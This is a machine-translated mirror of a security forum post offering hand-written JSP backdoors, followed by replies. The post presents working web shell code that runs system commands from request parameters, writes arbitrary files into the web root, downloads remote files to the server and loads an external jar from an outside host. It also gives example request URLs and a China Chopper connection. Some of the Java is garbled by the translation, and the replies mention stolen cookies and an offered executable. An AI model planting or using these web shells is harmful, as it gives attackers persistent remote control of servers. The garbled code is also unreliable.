Artikel ini adalah artikel cermin dari terjemahan mesin, silakan klik di sini untuk melompat ke artikel aslinya.

Melihat: 14991|Jawab: 7

[Alat Keamanan] Pintu belakang jsp tulisan tangan

[Salin tautan]
Diposting pada 02/01/2015 18.46.57 | | | |
Ditransfer dari: http://p2j.cn/?p=1627
1. Jalankan perintah sistem:
Jalankan perintah sistem tanpa gema:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Permintaan: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Tidak akan ada gema setelah eksekusi, yang sangat nyaman untuk cangkang pantulan.
Ada gema dengan verifikasi kata sandi:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = byte baru[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
Permintaan: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Kodekan string dan tulis ke file yang ditentukan:
1:
<%java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Permintaan: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Tulis ke direktori web:
<%java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Permintaan: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Permintaan: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Tulis ke direktori web:
<%java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Permintaan: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Unduh file jarak jauh (jika Anda tidak menggunakan utilitas apache io, Anda tidak dapat mengonversi aliran input ke byte, jadi sangat panjang...)
<% java.io.InputStream di = java.net.URL(request.getParameter("u")).openStream();    byte[] b = byte baru[1024];    java.io.ByteArrayOutputStream baos = java.io.ByteArrayOutputStream baru();    int a = -1;    sementara ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } java.io.FileOutputStream(request.getParameter("f"))).write(baos.toByteArray()); %>
Permintaan: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Unduh ke jalur web:
<% java.io.InputStream di = java.net.URL(request.getParameter("u")).openStream();    byte[] b = byte baru[1024];    java.io.ByteArrayOutputStream baos = java.io.ByteArrayOutputStream baru();    int a = -1;    sementara ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f"))).write(baos.toByteArray()); %>
Permintaan: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Empat: Refleksi memanggil toples eksternal, sempurnakan pintu belakang
Jika Anda tidak menyukai fungsi backdoor di atas terlalu lemah dan ketinggalan zaman, Anda dapat mencoba ini:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Permintaan: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Koneksi pisau dapur: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, kata sandi 023.

Solusi:
Gunakan refleksi untuk memuat jar eksternal ke dalam aplikasi saat ini, dan refleksi mengeksekusi hasil pemrosesan keluaran. request.getParameterMap() berisi semua parameter yang diminta. Karena paket jar eksternal dimuat, server harus dapat mengakses alamat jar ini.




Mantan:Krisis di balik file teks TXT
Depan:Enkripsi Java MD5, enkripsi Base64 dan dekripsi Java mengeksekusi kode sumber perintah sistem
Diposting pada 02/01/2015 20.17.30 |
Baru-baru ini meneliti pintu belakang jsp?
 Tuan tanah| Diposting pada 02/01/2015 20.39.44 |
admin Dipaparkan pada 2015-1-2 20:17
Baru-baru ini meneliti pintu belakang jsp?

Pernahkah Anda melihat jsp dalam satu kalimat? Saya menemukannya, saya tidak mempelajarinya secara mendalam, saya tidak mengerti xss, saya akhirnya mendapatkan cookie kemarin, dan saya tidak tahu cara mengubah unggahan cookie
Diposting pada 02/01/2015 20.44.40 |
Delver_Si Dipaparkan pada 2015-1-2 20:39
Pernahkah Anda melihat jsp dalam satu kalimat? Saya menemukannya, saya tidak menggali lebih dalam, saya tidak mengerti xss, saya akhirnya mendapatkan kue kemarin, saya tidak tahu cara memodifikasi cooki ...

Cookie saya tidak akan dicuri dengan file tanda tangan yang dipersonalisasi,,,

Gunakan plugin HackBar Firefox
Diposting pada 02/01/2015 20.48.57 |
Delver_Si Dipaparkan pada 2015-1-2 20:39
Pernahkah Anda melihat jsp dalam satu kalimat? Saya menemukannya, saya tidak menggali lebih dalam, saya tidak mengerti xss, saya akhirnya mendapatkan kue kemarin, saya tidak tahu cara memodifikasi cooki ...

Ghost Brother Multifungsi Browser v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Jumlah unduhan: 7, Harga jual: 1 Biji-bijian MB)
 Tuan tanah| Diposting pada 02/01/2015 20.57.50 |
admin dipaparkan pada 2015-1-2 20:44
Cookie saya tidak akan dicuri dengan file tanda tangan yang dipersonalisasi,,,

Gunakan plugin HackBar Firefox

Kemarin, pintu gratis kejang-kejang, dan saya tidak dapat terhubung, dan saya tidak bisa masuk ke toko Firefox.
 Tuan tanah| Diposting pada 02/01/2015 20.59.01 |
admin dipaparkan pada 2015-1-2 20:44
Cookie saya tidak akan dicuri dengan file tanda tangan yang dipersonalisasi,,,

Gunakan plugin HackBar Firefox

dz tidak memiliki celah ini
Diposting pada 02/01/2015 21.00.22 |
Delver_Si Dipaparkan pada 2015-1-2 20:59
dz tidak memiliki celah ini

Entahlah, Anda bisa mengujinya, jangan mengacaukan database saya   

Kita semua menggunakan Tor Browser untuk berkeliling dinding

Sanggahan:
Semua perangkat lunak, materi pemrograman, atau artikel yang diterbitkan oleh Code Farmer Network hanya untuk tujuan pembelajaran dan penelitian; Konten di atas tidak boleh digunakan untuk tujuan komersial atau ilegal, jika tidak, pengguna akan menanggung semua konsekuensi. Informasi di situs ini berasal dari Internet, dan sengketa hak cipta tidak ada hubungannya dengan situs ini. Anda harus sepenuhnya menghapus konten di atas dari komputer Anda dalam waktu 24 jam setelah pengunduhan. Jika Anda menyukai program ini, harap dukung perangkat lunak asli, pembelian pendaftaran, dan dapatkan layanan asli yang lebih baik. Jika ada pelanggaran, silakan hubungi kami melalui email.

Mail To:help@itsvse.com